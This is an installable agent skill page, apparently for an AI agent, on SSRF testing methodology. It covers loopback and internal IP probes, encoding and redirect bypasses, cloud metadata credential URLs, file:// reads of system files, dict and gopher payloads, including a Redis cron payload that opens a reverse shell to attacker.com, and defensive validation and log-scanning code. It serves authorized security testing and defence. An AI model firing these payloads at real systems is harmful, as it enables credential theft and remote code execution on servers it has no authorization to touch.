ssrf-testing


Professional Skills and Methodologies for SSRF (Server-Side Request Forgery) Testing


NPX Install

npx skill4agent add ed1s0nz/cyberstrikeai ssrf-testing

SKILL.md Content (Chinese)


SSRF (Server-Side Request Forgery) Testing

Overview

SSRF (Server-Side Request Forgery) is a vulnerability in which an attacker makes the server issue requests on their behalf, enabling access to internal network resources, port scanning of the internal network, or bypassing of firewall rules that only the server is trusted to cross. This skill covers methods for detecting, exploiting, and defending against SSRF vulnerabilities.

Vulnerability Principle

Applications accept URL parameters and request the specified URL. Attackers can control the target of the request, leading to:
  • Access to internal network resources
  • Local file reading
  • Port scanning
  • Firewall bypass
  • Cloud service metadata access

Testing Methods

1. Identify SSRF Input Points

Common Features:
  • URL Preview/Screenshot
  • File Upload (Remote URL)
  • Webhook Callback
  • API Proxy
  • Data Import
  • Image Processing
  • PDF Generation

2. Basic Detection

Test Local Loopback:
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
Test Internal Network IPs:
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
Test File Protocol:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts

3. Bypass Techniques

IP Address Encoding:
127.0.0.1 → 2130706433 (Decimal)
127.0.0.1 → 0x7f000001 (Hexadecimal)
127.0.0.1 → 0177.0.0.1 (Octal)
Domain Resolution Bypass:
127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me
URL Redirection:
http://attacker.com/redirect → http://127.0.0.1
Protocol Obfuscation:
http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1

Exploitation Techniques

Internal Network Detection

Port Scanning:
```bash
# Use Burp Intruder
http://127.0.0.1:22
http://127.0.0.1:3306
http://127.0.0.1:6379
http://127.0.0.1:8080
http://127.0.0.1:9200
```
Service Identification:
  • Response time differences
  • Error messages
  • HTTP status codes
  • Response content

Cloud Service Metadata

AWS EC2:
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Google Cloud:
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
Azure:
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01
Alibaba Cloud:
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/
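The IP encodings listed under Bypass Techniques and the metadata addresses above are exactly what a defender should look for in the application's own logs. The following is an added example (not part of the original skill) that decodes decimal, hexadecimal and octal host literals the way an inet_aton-based resolver would, classifies each user-supplied fetch target, and runs that check over constructed access-log lines. The log format, the `/preview?url=` endpoint and the sample entries are assumptions made for the demonstration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines for the demonstration (assumption: the app has a
# /preview?url=... fetcher); they are not from the original page.
SAMPLE_LOG = """\
10.1.2.3 - - [01/Jan/2024:10:00:00 +0000] "GET /healthz HTTP/1.1" 200
10.1.2.3 - - [01/Jan/2024:10:00:01 +0000] "GET /preview?url=https://cdn.example.com/a.png HTTP/1.1" 200
10.1.2.3 - - [01/Jan/2024:10:00:02 +0000] "GET /preview?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200
10.1.2.3 - - [01/Jan/2024:10:00:03 +0000] "GET /preview?url=http://2130706433/ HTTP/1.1" 500
10.1.2.3 - - [01/Jan/2024:10:00:04 +0000] "GET /preview?url=http://0x7f000001:6379/ HTTP/1.1" 500
10.1.2.3 - - [01/Jan/2024:10:00:05 +0000] "GET /preview?url=http://0177.0.0.1/ HTTP/1.1" 500
10.1.2.3 - - [01/Jan/2024:10:00:06 +0000] "GET /preview?url=gopher://127.0.0.1:6379/_%2A1%0D%0A HTTP/1.1" 400
10.1.2.3 - - [01/Jan/2024:10:00:07 +0000] "GET /preview?url=http://metadata.google.internal/computeMetadata/v1/ HTTP/1.1" 200
10.1.2.3 - - [01/Jan/2024:10:00:08 +0000] "GET /preview?url=http://127.0.0.1.nip.io/ HTTP/1.1" 200
10.1.2.3 - - [01/Jan/2024:10:00:09 +0000] "GET /preview?url=http://100.100.100.200/latest/meta-data/ HTTP/1.1" 200
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
ALLOWED_SCHEMES = {"http", "https"}
METADATA_HOSTS = {"metadata.google.internal"}
WILDCARD_DNS_SUFFIXES = (".nip.io", ".xip.io", ".localtest.me")


def _c_int(part):
    """Parse one dotted component with C inet_aton rules: 0x.. hex, 0.. octal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part, 10)
    raise ValueError(part)


def decode_ip_literal(host):
    """Return the address a host literal denotes, or None if it is a name.
    Accepts the forms an inet_aton-based resolver accepts (2130706433,
    0x7f000001, 0177.0.0.1, 127.1), so obfuscated loopback is still recognised."""
    host = host.strip("[]")
    if ":" in host:  # IPv6 literal
        try:
            return ipaddress.ip_address(host)
        except ValueError:
            return None
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_c_int(p) for p in parts]
    except ValueError:
        return None
    value = 0
    for n in nums[:-1]:
        if n > 0xFF:
            return None
        value = (value << 8) | n
    remaining_bytes = 4 - (len(nums) - 1)  # the last component fills the rest
    if nums[-1] >= 1 << (8 * remaining_bytes):
        return None
    return ipaddress.IPv4Address((value << (8 * remaining_bytes)) | nums[-1])


def classify_target(url):
    """Reasons a user-supplied fetch target is suspicious (empty set if none)."""
    reasons = set()
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        reasons.add("dangerous-scheme")
    host = (parsed.hostname or "").lower()  # hostname drops userinfo and port
    ip = decode_ip_literal(host) if host else None
    if ip is not None and not ip.is_global:
        reasons.add("non-global-ip")  # loopback, RFC 1918, 169.254/16, 100.64/10
    if host in METADATA_HOSTS:
        reasons.add("metadata-host")
    if host == "localtest.me" or host.endswith(WILDCARD_DNS_SUFFIXES):
        reasons.add("wildcard-dns")
    return reasons


def scan_log(text, param="url"):
    """Return (line_no, target, reasons) for log lines whose fetch parameter is suspicious."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        for target in parse_qs(urlparse(m.group(1)).query).get(param, []):
            reasons = classify_target(target)
            if reasons:
                hits.append((line_no, target, sorted(reasons)))
    return hits


if __name__ == "__main__":
    for line_no, target, reasons in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {target} -> {', '.join(reasons)}")
```

The decoder deliberately mirrors inet_aton rather than `ipaddress.ip_address`, because the latter rejects `2130706433` and `0x7f000001` as malformed while the resolver behind a typical HTTP client happily turns them into 127.0.0.1. Adapting the regular expression and parameter name to your own access-log format is all that is needed to run it over real data.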

Internal Network Application Attacks

Access Admin Backends:
http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin
Unauthorized Redis Access:
http://127.0.0.1:6379
# Then send Redis commands
FastCGI Attack:
http://127.0.0.1:9000
# Execute commands using FastCGI protocol

Advanced Exploitation

Gopher Protocol

Send Arbitrary Protocol Data:
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a
Redis Command Execution:
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

Dict Protocol

Port Scanning and Information Gathering:
dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status

File Protocol

Read Local Files:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ

Tool Usage

SSRFmap

```bash
# Basic Scan
python3 ssrfmap.py -r request.txt -p url

# Port Scan
python3 ssrfmap.py -r request.txt -p url -m portscan

# Cloud Metadata
python3 ssrfmap.py -r request.txt -p url -m cloud
```

Gopherus

```bash
# Generate Gopher payload
python gopherus.py --exploit redis
```

Burp Collaborator

Detect Blind SSRF:
http://burpcollaborator.net
# Observe if there are DNS/HTTP requests

Verification and Reporting

Verification Steps

  1. Confirm that the request target can be controlled
  2. Verify access to internal network resources or port scanning
  3. Assess the scope of impact (internal network penetration, data leakage, etc.)
  4. Record complete POC

Reporting Key Points

  • Vulnerability location and input parameters
  • Accessible internal network resources or ports
  • Complete exploitation steps and PoC
  • Fix recommendations (URL whitelist, disable dangerous protocols, etc.)

Defense Measures

Recommended Solutions

  1. URL Whitelist
    ```python
    from urllib.parse import urlparse

    ALLOWED_DOMAINS = ['example.com', 'cdn.example.com']
    parsed = urlparse(url)
    # Compare the hostname, not netloc: hostname drops userinfo and port and is
    # lower-cased, so "http://127.0.0.1:80@example.com" is judged by "example.com"
    if parsed.hostname not in ALLOWED_DOMAINS:
        raise ValueError("Domain not allowed")
    ```
  2. Disable Dangerous Protocols
    • Only allow http/https
    • Block file://, gopher://, dict://, etc.
  3. IP Address Filtering
    ```python
    import ipaddress

    def is_internal_ip(ip):
        addr = ipaddress.ip_address(ip)
        # is_private covers RFC 1918, loopback and link-local (169.254.0.0/16, the
        # cloud metadata address); "not is_global" additionally catches the shared
        # address space 100.64.0.0/10, which holds the Alibaba Cloud metadata IP
        return addr.is_private or addr.is_loopback or not addr.is_global
    ```
  4. Use DNS Resolution Verification
    • Resolve domain names to get IPs
    • Verify if the IP is within the internal network range
  5. Network Isolation
    • Restrict server outbound access permissions
    • Use proxy servers
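Measures 1, 3 and 4 above only work together: the allow-list must be applied to the parsed hostname, every address the hostname resolves to must be checked, and IPv4-mapped IPv6 answers must be unwrapped before the check. The following is an added example (not the skill's own code) that combines them into one validator with an injectable resolver. The allow-list, the `FAKE_DNS` answers and the 93.184.216.34 address are constructed for the demonstration; the default resolver uses `socket.getaddrinfo`.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_DOMAINS = {"example.com", "cdn.example.com"}  # constructed allow-list


class UnsafeURL(ValueError):
    """Raised when a user-supplied fetch target fails a policy check."""


def is_internal_ip(addr):
    """True for any address that is not globally routable.
    Unwraps IPv4-mapped IPv6 (::ffff:10.0.0.5) first so IPv4 rules apply, then
    relies on is_global, which is False for loopback, RFC 1918, link-local
    169.254.0.0/16 (cloud metadata) and the shared space 100.64.0.0/10."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global


def system_resolve(host):
    """Default resolver: every A/AAAA answer the OS returns for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_outbound_url(url, resolve=system_resolve):
    """Return (hostname, resolved addresses) if url passes policy, else raise UnsafeURL."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parsed.scheme!r}")
    # hostname, not netloc: it drops userinfo ("127.0.0.1:80@evil.com"), the port
    # and case; a trailing dot ("example.com.") would otherwise dodge the list
    host = (parsed.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_DOMAINS:
        raise UnsafeURL(f"host not allowed: {host!r}")
    addrs = resolve(host)
    if not addrs:
        raise UnsafeURL(f"host does not resolve: {host!r}")
    for addr in addrs:
        # check every answer: one internal record among public ones is enough to fail
        if is_internal_ip(addr):
            raise UnsafeURL(f"{host!r} resolves to non-global address {addr}")
    return host, addrs


def is_rejected(url, resolve=system_resolve):
    """Yes/no form of the check for call sites that do not need the reason."""
    try:
        validate_outbound_url(url, resolve)
    except UnsafeURL:
        return True
    return False


# Constructed DNS answers for the demonstration (assumption, not real records).
FAKE_DNS = {
    "cdn.example.com": ["93.184.216.34"],
    "example.com": ["93.184.216.34", "::ffff:10.0.0.5"],  # mixed public/internal answer
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for candidate in [
        "https://cdn.example.com/a.png",
        "http://127.0.0.1:80@cdn.example.com/",  # userinfo trick: real target is cdn.example.com
        "http://cdn.example.com@127.0.0.1/",
        "file:///etc/passwd",
        "http://2130706433/",
        "https://example.com/",
    ]:
        verdict = "rejected" if is_rejected(candidate, fake_resolve) else "allowed"
        print(f"{candidate} -> {verdict}")
```

Two points follow from the bypass list earlier on the page. First, the validator returns the addresses it checked so the caller can connect to one of them instead of resolving the name a second time; re-resolving would reopen the gap between check and use that a rebinding DNS answer exploits. Second, because URL redirection is listed as a bypass, the HTTP client must be configured not to follow redirects automatically, and each `Location` it reports must go through `validate_outbound_url` again before being fetched.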

Notes

  • Only perform tests in authorized environments
  • Avoid impacting internal network systems
  • Note the support status of different protocols
  • Pay attention to request frequency during testing to avoid triggering defenses